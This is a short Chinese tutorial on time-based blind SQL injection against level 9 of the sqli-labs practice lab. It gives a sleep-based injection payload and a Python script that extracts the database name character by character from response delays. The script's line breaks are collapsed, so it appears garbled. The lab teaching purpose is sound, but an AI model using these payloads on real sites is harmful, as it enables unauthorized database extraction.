在sql注入的第九关中,我们既看不到返回值,也不能通过布尔盲注得到结果,这个时候还有一种方法就是通过页面反应时间来获取信息,就是时间盲注
第九关的代码,可以看到无论是否正确,页面都会返回You are in
可以在网页中输入以下代码:
id=1' and if(ascii(substr(database(),1,1))>115, sleep(3), 0) --+
就可以通过页面的反应时间来判断信息的真假
可这样的查询方式依旧很麻烦,因此我们还是采取脚本的方式对页面进行注入
from typing import Dictimport requests
import timedef inject_database(url):name = ''for i in range(1,10):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr(database(),%d,1)) > %d, sleep(2), 0) --+" %(i,mid)params = {"id": payload}start_time = time.time()res = requests.get(url, params=params)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (high + low) // 2if mid == 32:breakname = name + chr(mid)print(name)return nameurl = 'http://127.0.0.1/sqli-labs/less-9/'
db_name = inject_database(url)
print("DATABASE是:", db_name)